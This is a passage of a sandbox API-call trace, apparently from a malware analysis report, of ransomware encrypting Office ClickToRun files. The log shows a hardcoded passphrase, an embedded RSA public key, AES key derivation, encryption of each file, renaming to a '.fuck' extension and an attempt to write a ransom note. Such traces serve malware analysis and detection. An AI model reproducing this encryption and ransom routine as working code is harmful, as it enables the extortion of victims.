"c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\en-us.16\\stream.platform.culture.man.xml")) returned 0x20 [0238.952] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\en-us.16\\stream.Platform.Culture.man.xml", dwFileAttributes=0x80) returned 0 [0238.953] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\en-us.16\\stream.Platform.Culture.man.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\en-us.16\\stream.platform.culture.man.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.953] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\en-us.16\\stream.Platform.Culture.man.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\en-us.16\\stream.platform.culture.man.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.954] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\en-us.16\\stream.Platform.Culture.man.xml.gsg", dwFileAttributes=0x2) returned 0 [0238.954] CryptAcquireContextA (in: phProv=0x2b9d1fc, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d1fc*=0x287fb98) returned 1 [0238.957] CryptCreateHash (in: hProv=0x287fb98, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d200 | out: phHash=0x2b9d200) returned 1 [0238.957] lstrlenA (lpString="BnDJACPrUGotpmdReKbXlIsdzMlQm") returned 29 [0238.957] CryptHashData (hHash=0x2893d30, pbData=0x28850e8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0238.957] CryptDeriveKey (in: hProv=0x287fb98, Algid=0x6610, hBaseData=0x2893d30, dwFlags=0x1000000, phKey=0x2b9d1ec | out: phKey=0x2b9d1ec*=0x2894170) returned 1 [0238.957] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----\\", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0238.957] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d208, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4 | out: pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4) returned 1 [0238.957] CryptAcquireContextA (in: phProv=0x2b9d1f8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d1f8*=0x2882480) returned 1 [0238.957] CryptImportPublicKeyInfo (in: hCryptProv=0x2882480, dwCertEncodingType=0x1, pInfo=0x2896810*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2896840*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2896848*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d1f0 | out: phKey=0x2b9d1f0*=0x28941b0) returned 1 [0238.958] CryptEncrypt (in: hKey=0x28941b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x80) returned 1 [0238.958] CryptEncrypt (in: hKey=0x28941b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2881e20*, pdwDataLen=0x2b9d1f4*=0x18, dwBufLen=0x80 | out: pbData=0x2881e20*, pdwDataLen=0x2b9d1f4*=0x80) returned 1 [0238.958] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2881e20, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0) returned 0 [0238.958] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d204*=0x0, lpOverlapped=0x0) returned 0 [0238.958] CryptEncrypt (in: hKey=0x2894170, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x10) returned 1 [0238.958] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0) returned 0 [0238.958] CloseHandle (hObject=0xffffffff) returned 1 [0238.958] CloseHandle (hObject=0xffffffff) returned 1 [0238.958] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\en-us.16\\stream.Platform.Culture.man.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\en-us.16\\stream.platform.culture.man.xml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\en-us.16\\stream.Platform.Culture.man.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\en-us.16\\stream.platform.culture.man.xml"), bFailIfExists=0) returned 0 [0238.959] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\en-us.16\\stream.Platform.Culture.man.xml", dwFileAttributes=0x0) returned 0 [0238.959] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\en-us.16\\stream.Platform.Culture.man.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\en-us.16\\stream.platform.culture.man.xml.gsg")) returned 0 [0238.960] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\en-us.16\\stream.Platform.Culture.man.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\en-us.16\\stream.platform.culture.man.xml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\en-us.16\\stream.Platform.Culture.man.xml.fuck" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\en-us.16\\stream.platform.culture.man.xml.fuck")) returned 0 [0238.960] CryptDestroyHash (hHash=0x2893d30) returned 1 [0238.960] CryptDestroyKey (hKey=0x2894170) returned 1 [0238.960] CryptReleaseContext (hProv=0x287fb98, dwFlags=0x0) returned 1 [0238.960] FindNextFileA (in: hFindFile=0x2894130, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0238.960] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e200 | out: lpSystemTimeAsFileTime=0x2b9e200) [0238.960] GetLastError () returned 0x5 [0238.961] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\en-us.16\\stream.x64.en-us.hash" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\en-us.16\\stream.x64.en-us.hash")) returned 0x20 [0238.961] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\en-us.16\\stream.x64.en-us.hash", dwFileAttributes=0x80) returned 0 [0238.961] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\en-us.16\\stream.x64.en-us.hash" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\en-us.16\\stream.x64.en-us.hash"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.962] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\en-us.16\\stream.x64.en-us.hash.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\en-us.16\\stream.x64.en-us.hash.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.962] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\en-us.16\\stream.x64.en-us.hash.gsg", dwFileAttributes=0x2) returned 0 [0238.962] CryptAcquireContextA (in: phProv=0x2b9d1fc, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d1fc*=0x287fb98) returned 1 [0238.965] CryptCreateHash (in: hProv=0x287fb98, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d200 | out: phHash=0x2b9d200) returned 1 [0238.965] lstrlenA (lpString="BnDJACPrUGotpmdReKbXlIsdzMlQm") returned 29 [0238.965] CryptHashData (hHash=0x2894170, pbData=0x2885048, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0238.965] CryptDeriveKey (in: hProv=0x287fb98, Algid=0x6610, hBaseData=0x2894170, dwFlags=0x1000000, phKey=0x2b9d1ec | out: phKey=0x2b9d1ec*=0x2893a30) returned 1 [0238.966] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----\\", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0238.966] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d208, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4 | out: pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4) returned 1 [0238.966] CryptAcquireContextA (in: phProv=0x2b9d1f8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d1f8*=0x2882948) returned 1 [0238.966] CryptImportPublicKeyInfo (in: hCryptProv=0x2882948, dwCertEncodingType=0x1, pInfo=0x2895b10*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2895b40*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2895b48*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d1f0 | out: phKey=0x2b9d1f0*=0x2893a70) returned 1 [0238.966] CryptEncrypt (in: hKey=0x2893a70, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x80) returned 1 [0238.966] CryptEncrypt (in: hKey=0x2893a70, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2881fb8*, pdwDataLen=0x2b9d1f4*=0x18, dwBufLen=0x80 | out: pbData=0x2881fb8*, pdwDataLen=0x2b9d1f4*=0x80) returned 1 [0238.966] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2881fb8, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0) returned 0 [0238.967] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d204*=0x0, lpOverlapped=0x0) returned 0 [0238.967] CryptEncrypt (in: hKey=0x2893a30, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x10) returned 1 [0238.967] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0) returned 0 [0238.967] CloseHandle (hObject=0xffffffff) returned 1 [0238.967] CloseHandle (hObject=0xffffffff) returned 1 [0238.967] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\en-us.16\\stream.x64.en-us.hash.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\en-us.16\\stream.x64.en-us.hash.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\en-us.16\\stream.x64.en-us.hash" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\en-us.16\\stream.x64.en-us.hash"), bFailIfExists=0) returned 0 [0238.967] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\en-us.16\\stream.x64.en-us.hash", dwFileAttributes=0x0) returned 0 [0238.968] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\en-us.16\\stream.x64.en-us.hash.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\en-us.16\\stream.x64.en-us.hash.gsg")) returned 0 [0238.968] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\en-us.16\\stream.x64.en-us.hash" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\en-us.16\\stream.x64.en-us.hash"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\en-us.16\\stream.x64.en-us.hash.fuck" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\en-us.16\\stream.x64.en-us.hash.fuck")) returned 0 [0238.969] CryptDestroyHash (hHash=0x2894170) returned 1 [0238.969] CryptDestroyKey (hKey=0x2893a30) returned 1 [0238.969] CryptReleaseContext (hProv=0x287fb98, dwFlags=0x0) returned 1 [0238.969] FindNextFileA (in: hFindFile=0x2894130, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0238.969] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e200 | out: lpSystemTimeAsFileTime=0x2b9e200) [0238.969] GetLastError () returned 0x5 [0238.969] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\en-us.16\\stream.x64.en-us.man.dat" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\en-us.16\\stream.x64.en-us.man.dat")) returned 0x20 [0238.970] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\en-us.16\\stream.x64.en-us.man.dat", dwFileAttributes=0x80) returned 0 [0238.970] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\en-us.16\\stream.x64.en-us.man.dat" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\en-us.16\\stream.x64.en-us.man.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.970] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\en-us.16\\stream.x64.en-us.man.dat.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\en-us.16\\stream.x64.en-us.man.dat.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.971] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\en-us.16\\stream.x64.en-us.man.dat.gsg", dwFileAttributes=0x2) returned 0 [0238.971] CryptAcquireContextA (in: phProv=0x2b9d1fc, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d1fc*=0x287fb98) returned 1 [0238.974] CryptCreateHash (in: hProv=0x287fb98, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d200 | out: phHash=0x2b9d200) returned 1 [0238.974] lstrlenA (lpString="BnDJACPrUGotpmdReKbXlIsdzMlQm") returned 29 [0238.974] CryptHashData (hHash=0x2893df0, pbData=0x2885020, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0238.974] CryptDeriveKey (in: hProv=0x287fb98, Algid=0x6610, hBaseData=0x2893df0, dwFlags=0x1000000, phKey=0x2b9d1ec | out: phKey=0x2b9d1ec*=0x2893a30) returned 1 [0238.974] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----\\", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0238.974] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d208, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4 | out: pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4) returned 1 [0238.974] CryptAcquireContextA (in: phProv=0x2b9d1f8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d1f8*=0x2882150) returned 1 [0238.975] CryptImportPublicKeyInfo (in: hCryptProv=0x2882150, dwCertEncodingType=0x1, pInfo=0x28964d0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2896500*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2896508*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d1f0 | out: phKey=0x2b9d1f0*=0x2893db0) returned 1 [0238.975] CryptEncrypt (in: hKey=0x2893db0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x80) returned 1 [0238.975] CryptEncrypt (in: hKey=0x2893db0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2882590*, pdwDataLen=0x2b9d1f4*=0x18, dwBufLen=0x80 | out: pbData=0x2882590*, pdwDataLen=0x2b9d1f4*=0x80) returned 1 [0238.975] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2882590, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0) returned 0 [0238.975] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d204*=0x0, lpOverlapped=0x0) returned 0 [0238.975] CryptEncrypt (in: hKey=0x2893a30, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x10) returned 1 [0238.975] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0) returned 0 [0238.975] CloseHandle (hObject=0xffffffff) returned 1 [0238.975] CloseHandle (hObject=0xffffffff) returned 1 [0238.975] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\en-us.16\\stream.x64.en-us.man.dat.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\en-us.16\\stream.x64.en-us.man.dat.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\en-us.16\\stream.x64.en-us.man.dat" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\en-us.16\\stream.x64.en-us.man.dat"), bFailIfExists=0) returned 0 [0238.976] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\en-us.16\\stream.x64.en-us.man.dat", dwFileAttributes=0x0) returned 0 [0238.976] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\en-us.16\\stream.x64.en-us.man.dat.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\en-us.16\\stream.x64.en-us.man.dat.gsg")) returned 0 [0238.977] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\en-us.16\\stream.x64.en-us.man.dat" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\en-us.16\\stream.x64.en-us.man.dat"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\en-us.16\\stream.x64.en-us.man.dat.fuck" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\en-us.16\\stream.x64.en-us.man.dat.fuck")) returned 0 [0238.977] CryptDestroyHash (hHash=0x2893df0) returned 1 [0238.977] CryptDestroyKey (hKey=0x2893a30) returned 1 [0238.977] CryptReleaseContext (hProv=0x287fb98, dwFlags=0x0) returned 1 [0238.977] FindNextFileA (in: hFindFile=0x2894130, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 0 [0238.977] FindClose (in: hFindFile=0x2894130 | out: hFindFile=0x2894130) returned 1 [0238.978] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\en-us.16\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\en-us.16\\readme_back_files.htm")) returned 0xffffffff [0238.978] AreFileApisANSI () returned 1 [0238.978] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x287fb98, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 125 [0238.978] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\en-us.16\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\en-us.16\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e474, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.978] GetLastError () returned 0x5 [0238.978] GetLastError () returned 0x5 [0238.979] FindNextFileA (in: hFindFile=0x28940f0, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0238.979] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\x-none.16\\*.*", lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 0x2893e70 [0238.980] FindNextFileA (in: hFindFile=0x2893e70, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0238.980] FindNextFileA (in: hFindFile=0x2893e70, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0238.980] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e200 | out: lpSystemTimeAsFileTime=0x2b9e200) [0238.980] GetLastError () returned 0x5 [0238.980] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\x-none.16\\MasterDescriptor.x-none.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\x-none.16\\masterdescriptor.x-none.xml")) returned 0x20 [0238.980] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\x-none.16\\MasterDescriptor.x-none.xml", 